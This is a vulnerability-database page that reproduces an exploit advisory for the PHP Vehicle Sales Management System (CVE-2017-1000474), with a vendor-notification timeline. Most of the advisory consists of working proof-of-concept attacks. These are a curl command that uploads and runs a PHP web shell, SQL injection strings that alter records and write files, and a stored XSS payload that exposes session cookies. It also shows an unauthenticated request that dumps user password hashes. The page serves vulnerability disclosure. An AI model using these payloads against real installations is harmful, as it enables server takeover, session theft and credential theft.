Vulners
Lucene search
Vehicle Sales Management System - Multiple Vulnerabilities
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Vehicle Sales Management System - Multiple Vulnerabilities | 20 Mar 201800:00 | – | zdt |
 | Soyket Chowdhury Vehicle Sales Management System Code Execution Vulnerability | 26 Jan 201800:00 | – | cnvd |
 | CVE-2017-1000474 | 24 Jan 201822:00 | – | cve |
 | CVE-2017-1000474 | 24 Jan 201822:00 | – | cvelist |
 | Vehicle Sales Management System - Multiple Vulnerabilities | 20 Mar 201800:00 | – | exploitdb |
 | EUVD-2017-1599 | 7 Oct 202500:30 | – | euvd |
 | CVE-2017-1000474 | 24 Jan 201822:29 | – | nvd |
 | CVE-2017-1000474 | 24 Jan 201822:29 | – | osv |
 | Vehicle Sales Management System XSS / Shell Upload / SQL Injection | 20 Mar 201800:00 | – | packetstorm |
 | Sql injection | 24 Jan 201822:29 | – | prion |
10
# Exploit Title: VSMS Multiple Vulnerabilities
# Google Dork: N/A
# Date: 16-3-2018
# Exploit Author: Sing
# Vendor Homepage: https://sourceforge.net/projects/vsms-php/?source=typ_redirect
# Software Link: https://sourceforge.net/projects/vsms-php/?source=typ_redirect
# Version: 07/2017 (possible v1.2)
# Tested on: CentOS 6.9
# CVE : CVE-2017-1000474
1 login/vehicles.php: Lack of file type filter enabling attacker to upload PHP scripts that can later be executed
POC
curl -i -b 'PHPSESSID=58csdp0as3lvqapqjesp67tr05' -F 'submit=submit' -F support_images[]=@./getShell.php http://10.0.0.14/soyket-vsms-php-63b563b/login/vehicles.php
The malicious PHP file has been uploaded to /var/www/html/soyket-vsms-php-63b563b/login/uploads. Now, browse to the location and note the file name. In my vase it's 1510529218getShell.php. To execute it do
curl http://10.0.0.14/soyket-vsms-php-63b563b/login/uploads/1510529218getShell.php?cmd=id
2 login/profile.php: Found SQLI in the Date of Birth text box.
POC
Paste the below POC into the birth date text box and update. A mysql version will appear in the Position box
2015-11-30',u_position=@@version,u_type='Employee' WHERE u_email='[email protected]';-- -
3 login/Actions.php: Found Stored XSS in manufacturer_name
POC
curl http://10.0.0.14/soyket-vsms-php-63b563b/login/Actions.php?action=create -d 'manufacturer_name=<script>alert(document.cookie)</script>'
Now when user's browse to login/model.php page, he/she will see an alert with the session cookie
http://10.0.0.14/soyket-vsms-php-63b563b/login/model.php
4 login/Actions.php (Multiple vulnerabilities)
POC (SQLI)
curl http://10.0.0.14/soyket-vsms-php-63b563b/login/Actions.php?action=checkuser -d "[email protected]' union select 'SQLIIII' into outfile'/tmp/stuff.txt"
This SQLI will write SQLIIII to /tmp/stuff.txt.
POC (Information Leak
curl http://10.0.0.14/soyket-vsms-php-63b563b/login/Actions.php?action=listu
This gives anonymous user full list of the users table with unsalted MD5 hash passwords.
5. Solution:
The author notified of a new version with fixes (possibly v1.3). It can be found at vendor’s home page
https://sourceforge.net/projects/vsms-php/?source=typ_redirect
Time Line
Author was notified of the vulnerabilities on 27-01-2018
Author notified of the new updates on 14-03-2018
Exploit released on 16-03-2018Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Mar 2018 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.02167